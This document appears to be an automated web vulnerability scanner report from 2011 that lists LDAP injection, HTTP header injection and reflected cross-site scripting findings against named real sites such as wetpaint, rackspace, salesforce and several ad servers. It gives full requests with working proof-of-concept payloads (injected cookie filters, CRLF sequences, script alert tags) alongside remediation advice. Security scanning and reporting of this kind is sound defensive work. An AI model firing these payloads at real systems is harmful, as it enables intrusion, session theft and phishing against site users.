GET /page/News%20&%20Notes HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:02 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDb0KQplXflNS; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=29ACFDB542CC9D231636A2ABAB0EB558; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:02 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 48817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>News & Notes - HTC Smartphone Wiki</title>
<meta name="keywords" content="News & Notes - HTC Smartphone Wiki, HTC pocket pcs,HTC smartphones" /> <meta name="description" content="Welcome to the HTC Wiki While this is a customer forum that is sponsored by HTC, HTC is not endorsing nor condoning any tweaks, hacks, 3rd party downloads, home..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/News%20&%20Notes HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:02 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDQlnXVdpGpvo; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:02 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 48816
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>News & Notes - HTC Smartphone Wiki</title>
<meta name="keywords" content="News & Notes - HTC Smartphone Wiki, HTC pocket pcs,HTC smartphones" /> <meta name="description" content="Welcome to the HTC Wiki While this is a customer forum that is sponsored by HTC, HTC is not endorsing nor condoning any tweaks, hacks, 3rd party downloads, home..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads e12e88b7f72b1e00)(sn=* and e12e88b7f72b1e00)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=e12e88b7f72b1e00)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 301 http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Date: Sat, 05 Feb 2011 16:03:54 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tc3ngTgFfjbDVQBReKOu0D; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=37D200DEA26CB516297F139E657C785E; Path=/ Location: http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:54 GMT Connection: close Content-Type: text/html
Request 2
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=e12e88b7f72b1e00)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 301 http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Date: Sat, 05 Feb 2011 16:03:54 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tc3ngTgFfjbMkmEaMlpYtE; Domain=htcwiki.wetpaint.com; Path=/ Location: http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:54 GMT Connection: close Content-Type: text/html
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads 50260929ef7288ed)(sn=* and 50260929ef7288ed)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/android+phones+thru+t-mobile HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=50260929ef7288ed)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:06:51 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tf1cEci1QjC1isFZiwJR4A; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=050EE660B2200406206B1511BC1E48E0; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:06:51 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 32184
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
Request 2
GET /page/android+phones+thru+t-mobile HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=50260929ef7288ed)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:06:54 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tf1cEci1QjC1VBXs5hLVz4; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:06:54 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 32182
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads 420ed5cc116574e)(sn=* and 420ed5cc116574e)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/thread HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=420ed5cc116574e)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 302 Moved Temporarily Date: Sat, 05 Feb 2011 16:05:49 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVUJ1bfy3T975VOKz4zdgk; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=D0642FD589895DD7B949209A4F49E1D2; Path=/ Location: http://htcwiki.wetpaint.com/search/everything/thread?contains=thread Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:49 GMT Connection: close Content-Type: text/html
Request 2
GET /page/thread HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=420ed5cc116574e)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sat, 05 Feb 2011 16:05:49 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVUJ1bfy3T95WfOwfgImIi; Domain=htcwiki.wetpaint.com; Path=/ Location: http://htcwiki.wetpaint.com/search/everything/thread?contains=thread Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:49 GMT Connection: close Content-Type: text/html
The exp_last_activity cookie appears to be vulnerable to LDAP injection attacks.
The payloads 80f3942c7df929a3)(sn=* and 80f3942c7df929a3)!(sn=* were each submitted in the exp_last_activity cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=80f3942c7df929a3)(sn=*; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "39941"; var IS_dept = "MH_Sales_en_US"; var IS_invite = "yes";
var IS_UASrackuid = "US4da9da571af9d6d58e6c524219e4d7f8"; var IS_UAScmpc = "cleanEntry"; var IS_UASreferrer = "2f0f5a42a8503e776f91e0e5"; var IS_PageName = "Why Rackspace: The Rackspace Network: Bandwidth Billing:";
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "39941"; var IS_dept = "MH_Sales_en_US"; var IS_invite = "yes";
var IS_UASrackuid = "US4da9da571af9d6d58e6c524219e4d7f8"; var IS_UAScmpc = "cleanEntry"; var IS_UASreferrer = "http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2"; var IS_PageName = "Why Rackspace: The Rackspace Network: Bandwidth Billing:";
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the sn request parameter is copied into the Set-Cookie response header. The payload c05ff%0d%0a4e5b36c7f18 was submitted in the sn parameter. This caused a response containing an injected HTTP header.
Request
GET /scripts/wptrk?sn=c05ff%0d%0a4e5b36c7f18&v=20110120041852 HTTP/1.1 Host: create.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:00:08 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=8CB829864DFEBAF27580A4F19AA1591F; Path=/ Set-Cookie: wptrk="sn=c05ff 4e5b36c7f18&i=1"; Domain=wetpaint.com; Path=/ Set-Cookie: wpptrk=gpvc=1&ab=0; Domain=wetpaint.com; Expires=Sun, 05-Feb-2012 16:00:08 GMT; Path=/ Set-Cookie: wpptrk2d=coppa=; Domain=wetpaint.com; Expires=Mon, 07-Feb-2011 16:00:08 GMT; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:00:08 GMT Vary: Accept-Encoding Content-Type: application/x-javascript;charset=UTF-8 Content-Length: 142
The value of REST URL parameter 2 is copied into the Location response header. The payload f0d45%0d%0afc099dc298 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/f0d45%0d%0afc099dc298 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/f0d45 fc099dc298/ Date: Sat, 05 Feb 2011 15:53:04 GMT Connection: close Content-Length: 91
The URL has moved to <a href="/servlet/f0d45 fc099dc298/">/servlet/f0d45 fc099dc298/</a>
4. Cross-site scripting (reflected)
There are 609 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fe2"><script>alert(1)</script>fb7584e1aad was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=68fe2"><script>alert(1)</script>fb7584e1aad&t=SZ0ow4Nphk6QF4pEA%2fVMyWaMT7jB%2b6YWlSbtq1MTlw4wwHhN8C4NevvUFcvC6BcllnpjtVTlx6Lo00KykqDZYlCIlwCpxQ0RPpuZrKYlf%2bQ%3d%7csdNiQEA8dhzYJiYNhzK0rFlA6psa777s5ejGP%2flK%2bQo%3d HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=83&mpid=1051202&fpid=-1&rnd=2858799619219382112&nu=n&sp=n Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; ...[SNIP]...
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 04-Aug-2011 15:59:34 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sat, 05 Feb 2011 15:59:33 GMT Content-Length: 546
4.2. http://ads.addynamix.com/creative/2-2126953-88j [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.addynamix.com
Path: /creative/2-2126953-88j
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ca0'-alert(1)-'7a99b6b9948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /creative/2-2126953-88j??79ca0'-alert(1)-'7a99b6b9948=1 HTTP/1.1 Host: ads.addynamix.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UC=1.0.20050_0_1106.0; PI2126953_85=I4d4d644cJ2K2L0M2N1O15180
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:34 GMT Server: Apache Server-Index: i1 P3P: policyref="http://banners.pennyweb.com/w3c/p3p.xml",CP="NON STP DSP COR CUR TAI OUR STA" Pragma: no-cache Cache-Control: no-store,no-cache Set-Cookie: PI2126953_88=I4d4d73e6J63b0K77064L2eM1960dN1O15180; expires=Sun, 06-Feb-2011 15:59:34 GMT; path=/; domain=ads.addynamix.com Content-Length: 734 Connection: close Content-Type: text/html Expires: Sat, 05 Feb 2011 15:59:34 GMT
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 5ca84<script>alert(1)</script>e6063e28591 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=W25t6coj820hSGmI5ca84<script>alert(1)</script>e6063e28591 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=223547500743A002098EB099848151AA; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sat, 05 Feb 2011 15:59:33 GMT Connection: close
The value of the kvq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bb3a'-alert(1)-'39269acb9b9 was submitted in the kvq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=2bb3a'-alert(1)-'39269acb9b9 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript
